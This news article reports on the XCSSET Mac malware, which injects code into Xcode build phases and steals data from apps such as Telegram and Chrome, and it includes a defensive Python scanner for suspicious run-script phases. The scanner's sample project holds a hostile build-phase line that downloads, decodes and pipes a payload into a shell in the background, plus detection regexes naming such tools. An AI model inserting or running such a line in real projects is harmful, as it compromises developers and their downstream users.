This devious Mac malware has developers in its crosshairs


Malware analysts have shared new details about the infamous XCSSET malware that targets Mac devices around the world.

XCSSET first came into the spotlight in August 2020, when it was found inside Xcode projects, the project files of Apple's free Xcode integrated development environment (IDE). A variant of the malware compiled specifically for M1-powered Macs was discovered later.

Now, cybersecurity researchers at Trend Micro have once again found an updated version of the malware that’s taken on new features and can target popular apps including Telegram and Google Chrome.


“The changes we’ve encountered in XCSSET do not reflect a fundamental change in its behavior but do constitute refinements in its tactics,” note the researchers in a blog post analyzing XCSSET’s information stealing capabilities.

Targeting developers

The XCSSET malware is particularly troublesome since its infection mechanism can be used to launch supply-chain-like attacks.

The malware works by injecting malicious code into local Xcode projects, where it runs every time the project is built. This is a problem not just for the developers themselves, but for any downstream users who run software produced from the infected project.
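Because the injected code lives in the project file and fires on every build, the practical check for a developer is to enumerate the run-script build phases in each project.pbxproj and look at what they execute. The scanner below is an added example written for this page, not Trend Micro's tooling or any XCSSET indicator list: it parses the OpenStep-style project.pbxproj format, pulls out every PBXShellScriptBuildPhase, and scores each script against a small set of assumed indicators (download, decode, pipe-to-shell, background execution and the like) that are rare in honest build scripts. The embedded pbxproj text is constructed for the demo; the hostnames and object IDs in it are made up.

```python
"""Scan Xcode project.pbxproj files for run-script build phases that look injected.

A run-script phase (isa = PBXShellScriptBuildPhase) executes on every build, so an
implant that persists there re-runs each time the developer hits Build.
"""
import re
from pathlib import Path

# Each object in project.pbxproj starts with a 24-hex-char ID, an optional
# "/* comment */", then " = {".  Objects are chunked from one header to the next.
OBJECT_HEADER = re.compile(r"^\s*([0-9A-F]{24})(?:\s*/\*.*?\*/)?\s*=\s*\{", re.M)
SHELL_SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')

# Assumed indicators: individually weak, but two or more in one build script is
# unusual for a linter or codegen step and worth a human look.
INDICATORS = {
    "download": re.compile(r"\b(curl|wget)\b"),
    "decode": re.compile(r"\bbase64\b"),
    "applescript": re.compile(r"\bosascript\b"),
    "eval": re.compile(r"\beval\b|\bsh\s+-c\b|\|\s*(?:/bin/)?(?:ba)?sh\b"),
    "interpreter": re.compile(r"\b(python[23]?|perl|ruby)\s+-[ec]\b"),
    "tmp_exec": re.compile(r"/tmp/\S+|chmod\s+\+x"),
    "background": re.compile(r"\bnohup\b|&\s*$", re.M),
}


def unescape_pbx(s):
    """Undo the C-style escapes pbxproj uses inside quoted strings."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def iter_objects(text):
    """Yield (object_id, object_text) for every top-level object in the file."""
    heads = list(OBJECT_HEADER.finditer(text))
    for i, h in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        yield h.group(1), text[h.start():end]


def scan_pbxproj_text(text):
    """Return one finding per run-script phase, flagged when >= 2 indicators hit."""
    findings = []
    for obj_id, body in iter_objects(text):
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue
        m = SHELL_SCRIPT.search(body)
        script = unescape_pbx(m.group(1)) if m else ""
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
        findings.append({"id": obj_id, "script": script,
                         "indicators": hits, "suspicious": len(hits) >= 2})
    return findings


def scan_tree(root):
    """Scan every project.pbxproj under root; returns {path: findings}."""
    return {str(p): scan_pbxproj_text(p.read_text(errors="replace"))
            for p in Path(root).rglob("*.xcodeproj/project.pbxproj")}


# Constructed sample: one benign linter phase, one phase that downloads and
# pipes a decoded payload into a shell in the background.
SAMPLE_PBXPROJ = r"""// !$*UTF8*$!
{
	archiveVersion = 1;
	objectVersion = 56;
	objects = {
		1A2B3C4D5E6F708192A3B4C5 /* Run SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		D4C3B2A1F0E9D8C7B6A59483 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL https://stage.example.invalid/p.txt | base64 -d | /bin/sh >/dev/null 2>&1 &\n";
		};
		0000000000000000000000AB /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			runOnlyForDeploymentPostprocessing = 0;
		};
	};
	rootObject = 0000000000000000000000CD /* Project object */;
}
"""

if __name__ == "__main__":
    for f in scan_pbxproj_text(SAMPLE_PBXPROJ):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{f['id']} {flag} {f['indicators']}\n  {f['script'].strip()}")
```

Run `scan_tree(Path.home() / "Developer")` (or wherever checkouts live) to sweep real projects; anything flagged should be compared against the script committed upstream, since a phase that appears only in the local working copy is exactly the pattern described above.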

Trend Micro has been monitoring the malware since last year and recently worked out how it steals information. Using Telegram and Google Chrome as examples, the researchers explained how the malware exfiltrates data to its command and control (C2) servers.

“Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory,” say the researchers, asking application developers not to store sensitive data, such as login information, in the sandbox directory.

Besides Telegram and Chrome, Trend Micro also found scripts targeting other popular apps, including Opera, Skype, Evernote and WeChat.


26 Jul 2021



